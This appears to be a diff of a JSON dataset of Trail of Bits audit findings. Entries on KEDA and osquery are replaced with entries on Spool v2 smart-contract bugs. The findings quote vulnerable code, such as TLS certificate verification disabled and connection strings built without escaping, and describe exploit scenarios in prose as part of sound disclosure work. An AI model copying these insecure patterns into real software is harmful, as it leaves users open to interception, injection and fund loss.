behavior could result in a panic due to a nil pointer dereference. Exploit Scenario One of the calls to http.NewRequestWithContext shown in gures 4.1 and 4.2 returns an error and a nil *Request pointer. The subsequent code dereferences the nil pointer, resulting in a panic, crash, and DoS condition for the aected KEDA scaler. Recommendations Short term, check the error return value before accessing the returned *Request (e.g., by calling methods on it). Long term, use CodeQL and its go/missing-error-check query to detect future instances of this issue.", + "title": "15. LinearAllocationProvider could return an incorrect result ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The LinearAllocationProvider contract returns an incorrect result when the given smart vault has a riskTolerance value of -8 due to an incorrect literal value in the riskArray variable. function calculateAllocation(AllocationCalculationInput calldata data) external pure returns ( uint256 [] memory ) { ... uint24 [21] memory riskArray = [ 100000, 95000, 900000 , ... ]; ... uint8 riskt = uint8 (data.riskTolerance + 10); // from 0 to 20 for ( uint8 i; i < data.apys.length; ++i) { ... results[i] = apy * riskArray[ uint8 (20 - riskt)] + risk * riskArray[ uint8 (riskt)] ; resSum += results[i]; } uint256 resSum2; for ( uint8 i; i < results.length; ++i) { results[i] = FULL_PERCENT * results[i] / resSum; resSum2 += results[i]; } results[0] += FULL_PERCENT - resSum2; return results; Figure 15.1: A snippet of the calculateAllocation function in spool-v2-core/LinearAllocationProvider.sol#L9L67 The riskArray s third element is incorrect; this aects the computed allocation for smart vaults that have a riskTolerance value of -8 because the riskt variable would be 2 , which is later used as index for the riskArray . The subexpression risk * riskArray[uint8(rikst)] is incorrect by a factor of 10. Exploit Scenario Bob deploys a smart vault with a riskTolerance value of -8 and an empty strategyAllocation value. The allocation between the strategies is computed on the spot using the LinearAllocationProvider contract, but the allocation is wrong. Recommendations Short term, replace 900000 with 90000 in the calculateAllocation function. Long term, improve the systems unit and integration tests to catch issues such as this. Document the use and meaning of constants such as the values in riskArray . This will make it more likely that the Spool team will nd these types of mistakes.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Medium", "Difficulty: Medium" ] }, { - "title": "5. Unescaped components in PostgreSQL connection string ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The PostgreSQL scaler creates a connection string by formatting the congured host, port, username, database name, SSL mode, and password with fmt.Sprintf : meta.connection = fmt.Sprintf( \"host=%s port=%s user=%s dbname=%s sslmode=%s password=%s\" , host, port, userName, dbName, sslmode, password, ) Figure 5.1: pkg/scalers/postgresql_scaler.go#L127-L135 However, none of the parameters included in the format string are escaped before the call to fmt.Sprintf . According to the PostgreSQL documentation , To write an empty value, or a value containing spaces, surround it with single quotes, for example keyword = 'a value' . Single quotes and backslashes within a value must be escaped with a backslash, i.e., \\' and \\\\ . As KEDA does not perform this escaping, the connection string could fail to parse if any of the conguration parameters (e.g., the password) contains symbols with special meaning in PostgreSQL connection strings. Furthermore, this issue may allow the injection of harmful or unintended parameters into the connection string using spaces and equal signs. Although the latter attack violates assumptions about the applications behavior, it is not a severe issue in KEDAs case because users can already pass full connection strings via the connectionFromEnv conguration parameter. Exploit Scenario A user congures the PostgreSQL scaler with a password containing a space. As the PostgreSQL scaler does not escape the password in the connection string, when the client connection is initialized, the string fails to parse, an error is thrown, and the scaler does not function. Recommendations Short term, escape the user-provided PostgreSQL parameters using the method described in the PostgreSQL documentation . Long term, use the custom Semgrep rule provided in Appendix C to detect future instances of this issue.", + "title": "16. Incorrect formula used for adding/subtracting two yields ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The doHardWork function adds two yields with dierent base values to compute the given strategys total yield, which results in the collection of fewer ecosystem fees and treasury fees. It is incorrect to add two yields that have dierent base values. The correct formula to compute the total yield from two consecutive yields Y1 and Y2 is Y1 + Y2 + (Y1*Y2) . The doHardWork function in the Strategy contract adds the protocol yield and the rewards yield to calculate the given strategys total yield. The protocol yield percentage is calculated with the base value of the strategys total assets at the start of the current do hard work cycle, while the rewards yield percentage is calculated with the base value of the total assets currently owned by the strategy. dhwInfo.yieldPercentage = _getYieldPercentage(dhwParams.baseYield); dhwInfo.yieldPercentage += _compound(dhwParams.assetGroup, dhwParams.compoundSwapInfo, dhwParams.slippages); Figure 16.1: A snippet of the doHardWork function in spool-v2-core/Strategy.sol#L95L96 Therefore, the total yield of the strategy is computed as less than its actual yield, and the use of this value to compute fees results in the collection of fewer fees for the platforms governance system. Same issue also aects the computation of the total yield of a strategy on every do hard work cycle: _stateAtDhw[strategy][dhwIndex] = StateAtDhwIndex({ sharesMinted: uint128 (dhwInfo.sharesMinted), totalStrategyValue: uint128 (dhwInfo.valueAtDhw), totalSSTs: uint128 (dhwInfo.totalSstsAtDhw), yield: int96 (dhwInfo.yieldPercentage) + _stateAtDhw[strategy][dhwIndex - 1].yield, // accumulate the yield from before timestamp: uint32 (block.timestamp) }); Figure 16.2: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L331L337 This value of the total yield of a strategy is used to calculate the management fees for a given smart vault, which results in fewer fees paid to the smart vault owner. Exploit Scenario The Spool team deploys the system. Alice deposits 1,000 tokens into a vault, which mints 1,000 strategy share tokens for the vault. On the next do hard work execution, the tokens earn 8% yield and 30 reward tokens from the protocol. The 30 reward tokens are then exchanged for 20 deposit tokens. At this point, the total tokens earned by the strategy are 100 and the total yield is 10%. However, the doHardWork function computes the total yield as 9.85%, which is incorrect, resulting in fewer fees collected for the platform. Recommendations Short term, use the correct formula to calculate a given strategys total yield in both the Strategy contract and the StrategyRegistry contract. Note that the syncDepositsSimulate function subtracts a strategys total yield at dierent do hard work indexes in DepositManager.sol#L322L326 to compute the dierence between the strategys yields between two do hard work cycles. After xing this issue, this functions computation will be incorrect. Long term, review the entire codebase to nd all of the mathematical formulas used. Document these formulas, their assumptions, and their derivations to avoid the use of incorrect formulas.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "6. Redis scalers set InsecureSkipVerify when TLS is enabled ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The Redis Lists scaler (of which most of the code is reused by the Redis Streams scaler) supports the enableTLS option to allow the connection to the Redis server to use Transport Layer Security (TLS). However, when creating the TLSConfig for the Redis client, the scaler assigns the InsecureSkipVerify eld to the value of enableTLS (Figure 6.1), which means that certicate and server name verication is always disabled when TLS is enabled. This allows trivial MitM attacks, rendering TLS ineective. if info.enableTLS { options.TLSConfig = &tls.Config{ InsecureSkipVerify: info.enableTLS, } } Figure 6.1: KEDA sets InsecureSkipVerify to the value of info.enableTLS , which is always true in the block above. This pattern occurs in three locations: pkg/scalers/redis_scaler.go#L472-L476 , pkg/scalers/redis_scaler.go#L496-L500 , and pkg/scalers/redis_scaler.go#L517-L521 . KEDA does not document this insecure behavior, and users likely expect that enableTLS is implemented securely to prevent MitM attacks. The only public mention of this behavior is a stale, closed issue concerning this problem on GitHub . Exploit Scenario A user deploys KEDA with the Redis Lists or Redis Streams scaler. To protect the condentiality and integrity of data in transit between KEDA and the Redis server, the user sets the enableTLS metadata eld to true . Unbeknownst to the user, KEDA has disabled TLS certicate verication, allowing attackers on the network to modify the data in transit. An adversary can then falsify metrics coming from Redis to maliciously inuence the scaling behavior of KEDA and the Kubernetes cluster (e.g., by causing a DoS). Recommendations Short term, add a warning to the public documentation that the enableTLS option, as currently implemented, is not secure. Short term, do not enable InsecureSkipVerify when the user species the enableTLS parameter. 7. Insu\u0000cient check against nil Severity: Low Diculty: High Type: Data Validation Finding ID: TOB-KEDA-7 Target: pkg/scalers/azure_eventhub_scaler.go#L253-L259", + "title": "17. Smart vaults with re-registered strategies will not be usable ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The StrategyRegistry contract does not clear the state related to a strategy when removing it. As a result, if the removed strategy is registered again, the StrategyRegistry contract will still contain the strategys previous state, resulting in a temporary DoS of the smart vaults using it. The StrategyRegistry.registerStrategy function is used to register a strategy and to initialize the state related to it (gure 17.1). StrategyRegistry tracks the state of the strategies by using their address. function registerStrategy ( address strategy ) external { _checkRole(ROLE_SPOOL_ADMIN, msg.sender ); if (_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert StrategyAlreadyRegistered({address_: strategy}); _accessControl.grantRole(ROLE_STRATEGY, strategy); _currentIndexes[strategy] = 1 ; _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio(); _stateAtDhw[ address (strategy)][ 0 ].timestamp = uint32 ( block.timestamp ); } Figure 17.1: The registerStrategy function in spool-v2-core/StrategyRegistry.sol The StrategyRegistry._removeStrategy function is used to remove a strategy by revoking its ROLE_STRATEGY role. function _removeStrategy ( address strategy ) private { if (!_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert InvalidStrategy({address_: strategy}); _accessControl.revokeRole(ROLE_STRATEGY, strategy); } Figure 17.2: The _removeStrategy function in spool-v2-core/StrategyRegistry.sol While removing a strategy, StrategyRegistry contract does not remove the state related to that strategy. As a result, when that strategy is registered again, StrategyRegistry will contain values from the previous period. This could make the smart vaults using the strategy unusable or cause the unintended transfer of assets between other strategies and this strategy. Exploit Scenario Strategy S is registered. StrategyRegistry._currentIndex[S] is equal to 1 . Alice creates a smart vault X that uses strategy S. Bob deposits 1 million WETH into smart vault X. StrategyRegistry._assetsDeposited[S][1][WETH] is equal to 1 million WETH. The doHardWork function is called for strategy S. WETH is transferred from the master wallet to strategy S and is deposited into the protocol. A Spool system admin removes strategy S upon hearing that the protocol is being exploited. However, the admin realizes that the protocol is not being exploited and re-registers strategy S. StrategyRegistry._currentIndex[S] is set to 1 . StrategyRegistry._assetsDeposited[S][1][WETH] is not set to zero and is still equal to 1 million WETH. Alice creates a new vault with strategy S. When doHardWork is called for strategy S, StrategyRegistry tries to transfer 1 million WETH to the strategy. The master wallet does not have those assets, so doHardWork fails for strategy S. The smart vault becomes unusable. Recommendations Short term, modify the StrategyRegistry._removeStrategy function so that it clears states related to removed strategies if re-registering strategies is an intended use case. If this is not an intended use case, modify the StrategyRegistry.registerStrategy function so that it veries that newly registered strategies have not been previously registered. Long term, properly document all intended use cases of the system and implement comprehensive tests to ensure that the system behaves as expected.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, { - "title": "1. Use of fmt.Sprintf to build host:port string ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "Several scalers use a construct like fmt.Sprintf(\"%s:%s\", host, port) to create a host:port address string from a user-supplied host and port. This approach is problematic when the host is a literal IPv6 address, which should be enclosed in square brackets when the address is part of a resource identier. An address created using simple string concatenation, such as with fmt.Sprintf , may fail to parse when given to Go standard library functions. The following source les incorrectly use fmt.Sprintf to create an address: pkg/scalers/cassandra_scaler.go:115 pkg/scalers/mongo_scaler.go:191 pkg/scalers/mssql_scaler.go:220 pkg/scalers/mysql_scaler.go:149 pkg/scalers/predictkube_scaler.go:128 pkg/scalers/redis_scaler.go:296 pkg/scalers/redis_scaler.go:364 Recommendations Short term, use net.JoinHostPort instead of fmt.Sprintf to construct network addresses. The documentation for the net package states the following: JoinHostPort combines host and port into a network address of the form host:port . If host contains a colon, as found in literal IPv6 addresses, then JoinHostPort returns [host]:port . Long term, use Semgrep and the sprintf-host-port rule of semgrep-go to detect future instances of this issue.", + "title": "18. Incorrect handling of partially burned NFTs results in incorrect SVT balance calculation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The SmartVault._afterTokenTransfer function removes the given NFT ID from the SmartVault._activeUserNFTIds array even if only a fraction of it is burned. As a result, the SmartVaultManager.getUserSVTBalance function, which uses SmartVault._activeUserNFTIds , will show less than the given users actual balance. SmartVault._afterTokenTransfer is executed after every token transfer (gure 18.1). function _afterTokenTransfer ( address , address from , address to , uint256 [] memory ids, uint256 [] memory , bytes memory ) internal override { // burn if (to == address ( 0 )) { uint256 count = _activeUserNFTCount[from]; for ( uint256 i ; i < ids.length; ++i) { for ( uint256 j = 0 ; j < count; j++) { if (_activeUserNFTIds[from][j] == ids[i]) { _activeUserNFTIds[from][j] = _activeUserNFTIds[from][count - 1 ]; count--; break ; } } } _activeUserNFTCount[from] = count; return ; } [...] } Figure 18.1: A snippet of the _afterTokenTransfer function in spool-v2-core/SmartVault.sol It removes the burned NFT from _activeUserNFTIds . However, it does not consider the amount of the NFT that was burned. As a result, NFTs that are not completely burned will not be considered active by the vault. SmartVaultManager.getUserSVTBalance uses SmartVault._activeUserNFTIds to calculate a given users SVT balance (gure 18.2). function getUserSVTBalance ( address smartVaultAddress , address userAddress ) external view returns ( uint256 ) { if (_accessControl.smartVaultOwner(smartVaultAddress) == userAddress) { (, uint256 ownerSVTs ,, uint256 fees ) = _simulateSync(smartVaultAddress); return ownerSVTs + fees; } uint256 currentBalance = ISmartVault(smartVaultAddress).balanceOf(userAddress); uint256 [] memory nftIds = ISmartVault(smartVaultAddress).activeUserNFTIds(userAddress); if (nftIds.length > 0 ) { currentBalance += _simulateNFTBurn(smartVaultAddress, userAddress, nftIds); } return currentBalance; } Figure 18.2: The getUserSVTBalance function in spool-v2-core/SmartVaultManager.sol Because partial NFTs are not present in SmartVault._activeUserNFTIds , the calculated balance will be less than the users actual balance. The front end using getUserSVTBalance will show incorrect balances to users. Exploit Scenario Alice deposits assets into a smart vault and receives a D-NFT. Alice's assets are deposited to the protocols after doHardWork is called. Alice claims SVTs by burning a fraction of her D-NFT. The smart vault removes the D-NFT from _activeUserNFTIds . Alice checks her SVT balance and panics when she sees less than what she expected. She withdraws all of her assets from the system. Recommendations Short term, add a check to the _afterTokenTransfer function so that it checks the balance of the NFT that is burned and removes the NFT from _activeUserNFTIds only when the NFT is burned completely. Long term, improve the systems unit and integration tests to extensively test view functions.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "2. MongoDB scaler does not encode username and password in connection string ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The MongoDB scaler creates a connection string URI by concatenating the congured host, port, username, and password: addr := fmt.Sprintf( \"%s:%s\" , meta.host, meta.port) auth := fmt.Sprintf( \"%s:%s\" , meta.username, meta.password) connStr = \"mongodb://\" + auth + \"@\" + addr + \"/\" + meta.dbName Figure 2.1: pkg/scalers/mongo_scaler.go#L191-L193 Per MongoDB documentation, if either the username or password contains a character in the set :/?#[]@ , it must be percent-encoded . However, KEDA does not do this. As a result, the constructed connection string could fail to parse. Exploit Scenario A user congures the MongoDB scaler with a password containing an @ character, and the MongoDB scaler does not encode the password in the connection string. As a result, when the client object is initialized, the URL fails to parse, an error is thrown, and the scaler does not function. Recommendations Short term, percent-encode the user-supplied username and password before constructing the connection string. Long term, use the custom Semgrep rule provided in Appendix C to detect future instances of this issue.", + "title": "19. Transfers of D-NFTs result in double counting of SVT balance ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The _activeUserNFTIds and _activeUserNFTCount variables are not updated for the sender account on the transfer of NFTs. As a result, SVTs for transferred NFTs will be counted twice, causing the system to show an incorrect SVT balance. The _afterTokenTransfer hook in the SmartVault contract is executed after every token transfer to update information about users active NFTs: function _afterTokenTransfer ( address , address from , address to , uint256 [] memory ids, uint256 [] memory , bytes memory ) internal override { // burn if (to == address ( 0 )) { ... return ; } // mint or transfer for ( uint256 i; i < ids.length; ++i) { _activeUserNFTIds[to][_activeUserNFTCount[to]] = ids[i]; _activeUserNFTCount[to]++; } } Figure 19.1: A snippet of the _afterTokenTransfer function in spool-v2-core/SmartVault.sol When a user transfers an NFT to another user, the function adds the NFT ID to the active NFT IDs of the receivers account but does not remove the ID from the active NFT IDs of the senders account. Additionally, the active NFT count is not updated for the senders account. The getUserSVTBalance function of the SmartVaultManager contract uses the SmartVault contracts _activeUserNFTIds array to calculate a given users SVT balance: function getUserSVTBalance ( address smartVaultAddress , address userAddress ) external view returns ( uint256 ) { if (_accessControl.smartVaultOwner(smartVaultAddress) == userAddress) { (, uint256 ownerSVTs ,, uint256 fees ) = _simulateSync(smartVaultAddress); return ownerSVTs + fees; } uint256 currentBalance = ISmartVault(smartVaultAddress).balanceOf(userAddress); uint256 [] memory nftIds = ISmartVault(smartVaultAddress).activeUserNFTIds(userAddress); if (nftIds.length > 0 ) { currentBalance += _simulateNFTBurn(smartVaultAddress, userAddress, nftIds); } return currentBalance; } Figure 19.2: The getUserSVTBalance function in spool-v2-core/SmartVaultManager.sol Because transferred NFT IDs are active for both senders and receivers, the SVTs corresponding to the NFT IDs will be counted for both users. This double counting will keep increasing the SVT balance for users with every transfer, causing an incorrect balance to be shown to users and third-party integrators. Exploit Scenario Alice deposits assets into a smart vault and receives a D-NFT. Alice's assets are deposited into the protocols after doHardWork is called. Alice transfers the D-NFT to herself. The SmartVault contract adds the D-NFT ID to _activeUserNFTIds for Alice again. Alice checks her SVT balance and sees double the balance she had before. Recommendations Short term, modify the _afterTokenTransfer function so that it removes NFT IDs from the active NFT IDs for the senders account when users transfer D-NFTs and W-NFTs. Long term, add unit test cases for all possible user interactions to catch issues such as this.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "3. Prometheus metrics server does not support TLS ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The KEDA Metrics Adapter exposes Prometheus metrics on an HTTP server listening on port 9022. Though Prometheus supports scraping metrics over TLS-enabled connections, KEDA does not oer TLS for this server. The function responsible for starting the HTTP server, prommetrics.NewServer , does so using the http.ListenAndServe function, which does not enable TLS. func (metricsServer PrometheusMetricServer) NewServer(address string , pattern string ) { http.HandleFunc( \"/healthz\" , func (w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) _, err := w.Write([] byte ( \"OK\" )) if err != nil { log.Fatalf( \"Unable to write to serve custom metrics: %v\" , err) } }) log.Printf( \"Starting metrics server at %v\" , address) http.Handle(pattern, promhttp.HandlerFor(registry, promhttp.HandlerOpts{})) // initialize the total error metric _, errscaler := scalerErrorsTotal.GetMetricWith(prometheus.Labels{}) if errscaler != nil { log.Fatalf( \"Unable to initialize total error metrics as : %v\" , errscaler) } log.Fatal( http.ListenAndServe(address, nil ) ) } Figure 3.1: prommetrics.NewServer exposes Prometheus metrics without TLS ( pkg/prommetrics/adapter_prommetrics.go#L82-L99 ). Exploit Scenario A user sets up KEDA with Prometheus integration, enabling the scraping of metrics on port", + "title": "20. Flawed loop for syncing ushes results in higher management fees ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The loop used to sync ush indexes in the SmartVaultManager contract computes an inated value of the oldTotalSVTs variable, which results in higher management fees paid to the smart vault owner. The _syncSmartVault function in the SmartVaultManager contract implements a loop to process every ush index from flushIndex.toSync to flushIndex.current : while (flushIndex.toSync < flushIndex.current) { ... DepositSyncResult memory syncResult = _depositManager.syncDeposits( smartVault, [flushIndex.toSync, bag.lastDhwSynced, bag.oldTotalSVTs], strategies_, [indexes, _getPreviousDhwIndexes(smartVault, flushIndex.toSync)], tokens, bag.fees ); bag.newSVTs += syncResult.mintedSVTs; bag.feeSVTs += syncResult.feeSVTs; bag.oldTotalSVTs += bag.newSVTs; bag.lastDhwSynced = syncResult.dhwTimestamp; emit SmartVaultSynced(smartVault, flushIndex.toSync); flushIndex.toSync++; } Figure 20.1: A snippet of the _syncSmartVault function in spool-v2-core/SmartVaultManager.sol This loop adds the value of mintedSVTs to the newSVTs variables and then computes the value of oldTotalSVTs by adding newSVTs to it in every iteration. Because mintedSVTs are added in every iteration, new minted SVTs are added for each ush index multiple times when the loop is iterated more than once. The value of oldTotalSVTs is then passed to the syncDeposit function of the DepositManager contract, which uses it to compute the management fee for the smart vault. The use of the inated value of oldTotalSVTs causes higher management fees to be paid to the smart vault owner. Exploit Scenario Alice deposits assets into a smart vault and ushes it. Before doHardWork is executed, Bob deposits assets into the same smart vault and ushes it. At this point, flushIndex.current has been increased twice for the smart vault. After the execution of doHardWork , the loop to sync the smart vault is iterated twice. As a result, a double management fee is paid to the smart vault owner, and Alice and Bob lose assets. Recommendations Short term, modify the loop so that syncResult.mintedSVTs is added to bag.oldTotalSVTs instead of bag.newSVTs . Long term, be careful when implementing accumulators in loops. Add test cases for multiple interactions to catch such issues.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "6. Redis scalers set InsecureSkipVerify when TLS is enabled ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The Redis Lists scaler (of which most of the code is reused by the Redis Streams scaler) supports the enableTLS option to allow the connection to the Redis server to use Transport Layer Security (TLS). However, when creating the TLSConfig for the Redis client, the scaler assigns the InsecureSkipVerify eld to the value of enableTLS (Figure 6.1), which means that certicate and server name verication is always disabled when TLS is enabled. This allows trivial MitM attacks, rendering TLS ineective. if info.enableTLS { options.TLSConfig = &tls.Config{ InsecureSkipVerify: info.enableTLS, } } Figure 6.1: KEDA sets InsecureSkipVerify to the value of info.enableTLS , which is always true in the block above. This pattern occurs in three locations: pkg/scalers/redis_scaler.go#L472-L476 , pkg/scalers/redis_scaler.go#L496-L500 , and pkg/scalers/redis_scaler.go#L517-L521 . KEDA does not document this insecure behavior, and users likely expect that enableTLS is implemented securely to prevent MitM attacks. The only public mention of this behavior is a stale, closed issue concerning this problem on GitHub . Exploit Scenario A user deploys KEDA with the Redis Lists or Redis Streams scaler. To protect the condentiality and integrity of data in transit between KEDA and the Redis server, the user sets the enableTLS metadata eld to true . Unbeknownst to the user, KEDA has disabled TLS certicate verication, allowing attackers on the network to modify the data in transit. An adversary can then falsify metrics coming from Redis to maliciously inuence the scaling behavior of KEDA and the Kubernetes cluster (e.g., by causing a DoS). Recommendations Short term, add a warning to the public documentation that the enableTLS option, as currently implemented, is not secure. Short term, do not enable InsecureSkipVerify when the user species the enableTLS parameter.", + "title": "21. Incorrect ghost strategy check ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The emergencyWithdraw and redeemStrategyShares functions incorrectly check whether a strategy is a ghost strategy after checking that the strategy has a ROLE_STRATEGY role. function emergencyWithdraw( address [] calldata strategies, uint256 [][] calldata withdrawalSlippages, bool removeStrategies ) external onlyRole(ROLE_EMERGENCY_WITHDRAWAL_EXECUTOR, msg.sender ) { for ( uint256 i; i < strategies.length; ++i) { _checkRole(ROLE_STRATEGY, strategies[i]); if (strategies[i] == _ghostStrategy) { continue ; } [...] Figure 21.1: A snippet the emergencyWithdraw function spool-v2-core/StrategyRegistry.sol#L456L465 function redeemStrategyShares( address [] calldata strategies, uint256 [] calldata shares, uint256 [][] calldata withdrawalSlippages ) external { for ( uint256 i; i < strategies.length; ++i) { _checkRole(ROLE_STRATEGY, strategies[i]); if (strategies[i] == _ghostStrategy) { continue ; } [...] Figure 21.2: A snippet the emergencyWithdraw function spool-v2-core/StrategyRegistry.sol#L477L486 A ghost strategy will never have the ROLE_STRATEGY role, so both functions will always incorrectly revert if a ghost strategy is passed in the strategies array. Exploit Scenario Bob calls redeemStrategyShares with the ghost strategy in strategies and the transaction unexpectedly reverts. Recommendations Short term, modify the aected functions so that they verify whether the given strategy is a ghost strategy before checking the role with _checkRole . Long term, clearly document which roles a contract should have and implement the appropriate checks to verify them.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" - ] - }, - { - "title": "7. Insu\u0000cient check against nil ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "Within a function in the scaler for Azure event hubs, the object partitionInfo is dereferenced before correctly checking it against nil . Before the object is used, a check conrms that partitionInfo is not nil . However, this check is insucient because the function returns if the condition is met, and the function subsequently uses partitionInfo without additional checks against nil . As a result, a panic may occur when partitionInfo is later used in the same function. func (s *azureEventHubScaler) GetUnprocessedEventCountInPartition(ctx context.Context, partitionInfo *eventhub.HubPartitionRuntimeInformation) (newEventCount int64 , checkpoint azure.Checkpoint, err error ) { // if partitionInfo.LastEnqueuedOffset = -1, that means event hub partition is empty if partitionInfo != nil && partitionInfo.LastEnqueuedOffset == \"-1\" { return 0 , azure.Checkpoint{}, nil } checkpoint, err = azure.GetCheckpointFromBlobStorage(ctx, s.httpClient, s.metadata.eventHubInfo, partitionInfo.PartitionID ) Figure 7.1: partionInfo is dereferenced before a nil check pkg/scalers/azure_eventhub_scaler.go#L253-L259 Exploit Scenario While the Azure event hub performs its usual applications, an application error causes GetUnprocessedEventCountInPartition to be called with a nil partitionInfo parameter. This causes a panic and the scaler to crash and to stop monitoring events. Recommendations Short term, edit the code so that partitionInfo is checked against nil before dereferencing it. Long term, use CodeQL and its go/missing-error-check query to detect future instances of this issue.", - "labels": [ - "Trail of Bits", - "Severity: Medium", - "Difficulty: Undetermined" + "Difficulty: Medium" ] }, { - "title": "8. Prometheus metrics server does not support authentication ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "When scraping metrics, Prometheus supports multiple forms of authentication , including Basic authentication, Bearer authentication, and OAuth 2.0. KEDA exposes Prometheus metrics but does not oer the ability to protect its metrics server with any of the supported authentication types. Exploit Scenario A user deploys KEDA on a network. An adversary gains access to the network and is able to issue HTTP requests to KEDAs Prometheus metrics server. As KEDA does not support authentication for the server, the attacker can trivially view the exposed metrics. Recommendations Short term, implement one or more of the authentication types that Prometheus supports for scrape targets. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "title": "22. Reward conguration not initialized properly when reward is zero ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The RewardManager.addToken function, which adds a new reward token for the given smart vault, does not initialize all conguration variables when the initial reward is zero. As a result, all calls to the RewardManager.extendRewardEmission function will fail, and rewards cannot be added for that vault. RewardManager.addToken adds a new reward token for the given smart vault. The reward tokens for a smart vault are tracked using the RewardManager.rewardConfiguration function. The tokenAdded value of the conguration is used to check whether the token has already been added for the vault (gure 22.1). function addToken ( address smartVault , IERC20 token, uint32 rewardsDuration , uint256 reward ) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { RewardConfiguration storage config = rewardConfiguration [smartVault][token]; if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted( address (token)); if ( config.tokenAdded != 0 ) revert RewardTokenAlreadyAdded( address (token)); if (rewardsDuration == 0 ) revert InvalidRewardDuration(); if (rewardTokensCount[smartVault] > 5 ) revert RewardTokenCapReached(); rewardTokens[smartVault][rewardTokensCount[smartVault]] = token; rewardTokensCount[smartVault]++; config.rewardsDuration = rewardsDuration; if ( reward > 0 ) { _extendRewardEmission(smartVault, token, reward); } } Figure 22.1: The addToken function in spool-v2-core/RewardManager.sol#L81L101 However, RewardManager.addToken does not update config.tokenAdded , and the _extendRewardEmission function, which updates config.tokenAdded , is called only when the reward is greater than zero. RewardManager.extendRewardEmission is the only entry point to add rewards for a vault. It checks whether token has been previously added by verifying that tokenAdded is greater than zero (gure 22.2). function extendRewardEmission ( address smartVault , IERC20 token, uint256 reward , uint32 rewardsDuration ) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted( address (token)); if (rewardsDuration == 0 ) revert InvalidRewardDuration(); if ( rewardConfiguration[smartVault][token].tokenAdded == 0 ) { revert InvalidRewardToken( address (token)); } [...] } Figure 22.2: The extendRewardEmission function in spool-v2-core/RewardManager.sol#L106L119 Because tokenAdded is not initialized when the initial rewards are zero, the vault admin cannot add the rewards for the vault in that token. The impact of this issue is lower because the vault admin can use the RewardManager.removeReward function to remove the token and add it again with a nonzero initial reward. Note that the vault admin can only remove the token without blacklisting it because the config.periodFinish value is also not initialized when the initial reward is zero. Exploit Scenario Alice is the admin of a smart vault. She adds a reward token for her smart vault with the initial reward set to zero. Alice tries to add rewards using extendRewardEmission , and the transaction fails. She cannot add rewards for her smart vault. She has to remove the token and re-add it with a nonzero initial reward. Recommendations Short term, use a separate Boolean variable to track whether a token has been added for a smart vault, and have RewardManager.addToken initialize that variable. Long term, improve the systems unit tests to cover all execution paths.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "1. Project dependencies are not monitored for vulnerabilities ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The osquery project depends on a large number of dependencies to realize the functionality of the existing tables. They are included as Git submodules in the project. The build mechanism of each dependency has been rewritten to suit the specic needs of osquery (e.g., so that it has as few dynamically loaded libraries as possible), but there is no process in place to detect published vulnerabilities in the dependencies. As a result, osquery could continue to use code with known vulnerabilities in the dependency projects. Exploit Scenario An attacker, who has gained a foothold on a machine running osquery, leverages an existing vulnerability in a dependency to exploit osquery. He escalates his privileges to those of the osquery agent or carries out a denial-of-service attack to block the osquery agent from sending data. Recommendations Short term, regularly update the dependencies to their latest versions. Long term, establish a process within the osquery project to detect published vulnerabilities in its dependencies. 15 Atlassian: osquery Security Assessment", + "title": "23. Missing function for removing reward tokens from the blacklist ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "A Spool admin can blacklist 